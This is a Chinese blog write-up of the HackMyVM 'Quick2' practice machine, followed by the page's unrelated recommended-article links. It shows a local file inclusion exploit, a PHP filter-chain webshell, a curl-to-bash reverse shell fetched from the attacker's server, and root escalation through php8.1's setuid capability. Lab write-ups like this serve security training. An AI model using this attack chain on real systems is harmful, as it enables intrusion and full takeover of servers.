Quick2 - HackMyVM

最新推荐文章于 2024-06-21 23:12:11 发布
最新推荐文章于 2024-06-21 23:12:11 发布
阅读量378 收藏 9
点赞数 5
分类专栏: hackmyvm靶场合集 文章标签: 安全 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanbinn/article/details/136166699
版权

简介

难度:简单

靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Quick2

image-20240219005030343

本地环境

虚拟机:vitual box

靶场IP(quick2):192.168.56.103

跳板机IP(windows 10):192.168.56.1 192.168.190.100

渗透机IP(ubuntu 22.04):192.168.190.30

扫描

小靶场,用nmap简单扫一下即可:

nmap -p 1-65535 -T4 -A -v 192.168.56.103

得到两个敏感端口:22和80

image-20240219005736517

http服务

先从网页入手,多点击几个网页,可以注意到URL是通过直接传入文件名来进行访问,怀疑有文件包含漏洞

image-20240219005942354

image-20240219010235216

image-20240219010325888

文件包含漏洞

传入路径./../../../etc/passwd,成功读取到文件内容

image-20240219010705728

但实际上后续既无法使用filter也无法使用RFI,没办法用常规手段传shell。

那就继续收集信息:回到刚才泄露出来的用户目录,筛选出两个用户andrew和nick:

image-20240219014559838

先检测第一个andrew,该用户目录下无法读取文件(其实读一下.bashrc就能基本判断出来),然后检测nick,得到回显

image-20240219014800742

flag格式默认为user.txt,读取,得到第一个flag

HMV{Its-gonna-be-a-fast-ride}

image-20240219014906597

目录遍历

后来想找找有没有其他文件,就直接遍历一下目录,然后找到新的文件

image-20240219015731981

然后进入神秘领域

image-20240219015834580

虽然也是LFI,但这次的可以filter了,所以传shell很方便。

image-20240219021314606

getshell

准备传入木马。先在跳板机上做两个端口转发,一个反弹shell一个做http服务。

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=40000 connectaddress=192.168.190.30 connectport=40000
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=40001 connectaddress=192.168.190.30 connectport=40001

image-20240219010903912

准备webshell:

<?php eval($_POST["a"]);?>'

然后用php_filter_chain_generator.py生成编码的webshell:

image-20240219101842472

使用蚁剑,密码为a,访问URL:

http://192.168.56.103/file.php?file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

成功连接:

image-20240219101912724

然后在渗透机上起一个http服务,用来传输shell:

python3 -m http.server 40000

再用python起一个监听:

rlwrap -cAr nc -lvvp 40001

image-20240219102607276

蚁剑上起一个终端,输入命令:

curl http://192.168.56.1:40000/shell.sh | bash

image-20240219102814836

得到shell,然后用python升级一下,得到完整的shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20240219102945587

提权

先把linpeas.sh放到http服务上,下载运行

image-20240219110143495

然后就能看到php8.1可以进行capabilities提权:

image-20240219111532914

直接输入如下命令即可:

php8.1 -r "posix_setuid(0); system('/bin/bash');"

image-20240219111627115

提权成功,读取/root/root.txt,得到flag:

HMV{This-was-a-Quick-AND-fast-machine}

古明地核
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
electron-quick-start-master 快速入门教程
05-31
electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-quick-start-master 快速入门教程electron-q
quick-cocos2dx-v3.3
08-24
quick-cocos2dx-v3.3
quick-cocos2d-x v3
01-23
quick-cocos2d-x v3 是在 cocos2dx 3.x 的最新版本基础之上,移植了原来 quick-cocos2d-x 的核心框架、强大的 player 、丰富的示例等,并增加更多新的功能。 GitHub: https://github.com/dualface/v3quick
QuickLook-3.6.11.msi
06-09
QuickLook-3.6.11.msi
Quick-Cocos2dx-Community 3.6.5 Release Note 带官方热更新等demo
04-28
Quick-Cocos2dx-Community 3.6.5 Release Note带官方热更新等demo
安全Linux Fanotify使用入门
追寻梦想的青春
06-19 678
fanotify是另一种文件监控机制,在使用上两者类似,都是先调用init函数初始化句柄,然后调用类似watch的函数添加监控路径,再使用select+read的方式读取出变化的事件,根据事件中给出的参数获取文件的路径、事件类型以及其他需要的数据。如果是监控主机上的路径,directed结合FAN_EVENT_ON_CHILD标志就只能监控目录以及目录下的文件,per-mount可以监控pathname所在的挂载点中所有文件或者目录的变化,而global模式可以监控整个文件系统。
c++中串口的安全封装使用
jjjxxxhhh123的博客
06-21 220
对于内置类型,如果不显式初始化,它们的值是未定义的,可能包含任何内容。在你的代码中,buffer是一个字符数组,不需要显式初始化,因为你马上就会用::read函数把数据填充进去。字符串构造:如果::read返回负值,那么std::string(buffer, bytes_read)中的bytes_read将是负值,这会导致未定义行为。你需要确保bytes_read是非负的。在上述代码中,我添加了对read函数返回值的检查,以确保没有发生错误。如果::read返回负值,我们将抛出一个异常,以指示读取失败。
安全】软件系统安全开发指南文件(指南)
xx_123321456的博客
06-21 175
2.2.应用系统软件功能安全设计要求。2.1.应用系统架构安全设计要求。2.5.应用系统数据库安全设计要求。2.3.应用系统存储安全设计要求。2.4.应用系统通讯安全设计要求。2.6.应用系统数据安全设计要求。
企业防盗版,如何保障上网安全
shenxinda_lu的博客
06-20 226
当需要访问互联网时,用户在隔离沙盒内进行操作,确保主机与互联网物理隔离,只有沙盒能够访问互联网,且沙盒与本机隔离。
如何隐藏真实的MAC地址和IP地址,保证多账户的安全
vmlogin888的博客
06-18 497
在计算机网络中,MAC地址(Media Access Control Address)和IP地址(Internet Protocol Address)是两个重要的概念,用于网络设备之间的通信。虽然它们都用于标识设备,但在运作原理和作用上有着明显的区别。
HSE在企业中的重要性:健康、安全与环境的全面保障
shuntian88的博客
06-18 468
通过健康风险评估、安全培训、风险管理和环境保护措施,企业不仅保障员工的健康和安全,还推动环境的可持续发展。定期监测员工的健康状况,及时发现和处理与工作环境相关的健康问题,预防职业病,确保员工保持良好的身体状态,提高工作效率和满意度。系统化的风险评估和管理,预防健康、安全和环境风险,减少事故和职业病的发生,保障员工和环境的安全。通过有效的HSE管理,企业在员工、社会和环境之间实现良好平衡,促进各方利益的共同发展。健康安全的工作环境和高效的资源管理,提升员工工作效率,优化企业运营流程。HSE管理的综合效益。
渗透测试之内核安全系列课程:Rootkit技术初探(六)
fearhacker的专栏
06-19 735
例如,它包含驱动类型、驱动大小、驱动对象、驱动标志、驱动的起始位置、驱动的大小、指向驱动程序映像的内存区对象、驱动的扩展空间、驱动名字等。DRIVER_OBJECT对象还包含了与驱动程序所管理的设备对象相关联的设备扩展结构,以及用于处理I/O请求的函数指针等信息。:这是一个指针,指向驱动程序所创建的设备对象链表的头部。:指向注册表中的硬件信息路径,为驱动程序提供设备特定的配置和参数( 在Windows内核模式驱动程序中,硬件数据库用于存储有关系统中所有设备实例的信息,如设备的设备路径、设备对象指针等 )。
【RK3588/算能/Nvidia智能盒子】AI算法应用于中国生物疫苗生产过程智能监测,赋能生产安全,提升品质管控
YEYUANGEN的专栏
06-19 819
AI赋能医药疫苗安全生产,将被动“监督”变为主动“监控”,事前实时预警,事中常态监测,事后规范管理,实现车间作业标准化、人员行为可控化、决策分析层级化,真正做到疫苗生产过程的信息化管理。基于计算机视觉检测技术在疫苗生产过程中标准动作及流程监管方面拥有的巨大潜力,将深入药企生产的更多场景,研发更多优质实用的AI视觉算法,推动医药行业的智能化发展。,大大提高检测效率,有着传统人工目检不具备的优势,对食品药品生产过程的风险排查及质量管控提供了新的监管思路。等,实现疫苗生产中灭活剂添加流程的规范性监管。
可燃气体报警器检定检验:江门工业安全新保障的实践与思考
BDjiance的博客
06-19 344
随着工业化进程的加快,可燃气体在江门工业生产中的应用越来越广泛。在这一背景下,可燃气体报警器的准确性和可靠性对于保障工业安全至关重要。接下来,佰德将深入探讨可燃气体报警器的重要性、江门工业的应用现状、检定检验流程、实际案例分享、数据支撑效果以及总结与展望。
G7易流赋能化工物流,实现安全、环保与效率的共赢
m0_67717291的博客
06-21 514
得益于G7易流平台400万+货车的真实轨迹和风险事件数据,我们发现不同行业的风险场景和事故水平是有极大区别的,危化行业56%的事故是侧翻,30%的高危司机造成了70%的事故发生,通过“AI驱动下的安全管理4层控制塔”整体安全体系建设和“三晒两抓”的安全管理方法闭环,能有效帮助化工企业实现良好的安全管理。自有车辆作为重资产,日常管理涉及到每辆车的证照、资质、保险等等,财运通系统可以把车辆信息全部记录上,并且支持照片上传,随时查看,证照、保险到期之前都会自动提醒,从根源上杜绝了证照、保险逾期的风险。
韶关化工安全生产新篇章:可燃气体报警器的校准与检测实践
BDjiance的博客
06-19 318
在韶关这座工业城市,化工行业是当地经济发展的重要支柱。然而,随着化工生产的不断发展,可燃气体泄漏的风险也日益增加。因此,可燃气体报警器在保障生产安全方面扮演着至关重要的角色。在这篇文章中,佰德将深入探讨可燃气体报警器的重要性、韶关化工的应用案例、校准检测的必要性、校准流程与标准以及案例分析,并得出结论,强调持续校准的意义。
Ilya出走记:SSI的超级安全革命
zixiangxian的博客
06-21 1031
那么问题来了,大部分人做不到。是的,可能大部分公司都是OpenAI而非SSI。那么除了大模型公司在内部致力于构建一个安全、可信的大模型之外,这两年随着技术和应用的发展,社会各界也对AI和大模型的安全作出了许多努力。2021年11月,联合国教科文组织就曾通过《人工智能伦理问题建议书》,希望为人工智能的发展,以及预防其潜在风险提供建议。今年3月份,联合国教科文组织总干事奥德蕾·阿祖莱还在公开呼吁,希望各国尽快实施这项建议,为人工智能发展设立伦理标准。
选择游戏服务器后期的安全维护有哪些?
wanhengwangluo的博客
06-19 478
随着科技的快速发展,网络行业也逐渐兴起,其中游戏行业也步入了人们的日常生活当中,网络游戏对于服务器的要求也是比较高的,大型的网络游戏需要有着高防御力的服务器,并根据企业自身的业务需求来选择服务器的配置,那么当我们选择游戏服务器后期的安全维护有哪些呢?并且制定一系列的应急措施,在发生安全事件时可以快速有效地处理。首先对于游戏服务器来说,系统与软件的更新的必不可少的,定期的进行更新服务器的系统和软件,打上最新的补丁,防止系统漏洞被攻击者利用,避免出现安全隐患,以此来提高服务器的安全性。
内容安全复习 5 - 深在线社交网络分析与舆情监测
最新发布
infinity_heaven的博客
06-21 820
在线社交网络分析、网络舆情检测。
quicklook-3.6.11.msi
07-15
### 回答2: quicklook-3.6.11.msi 是一款安装程序,用于安装QuickLook软件的版本号为3.6.11。QuickLook是一款在Windows系统上功能强大的预览工具,可以帮助用户快速预览各种文件,包括文本文档、图片、音频、视频等...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值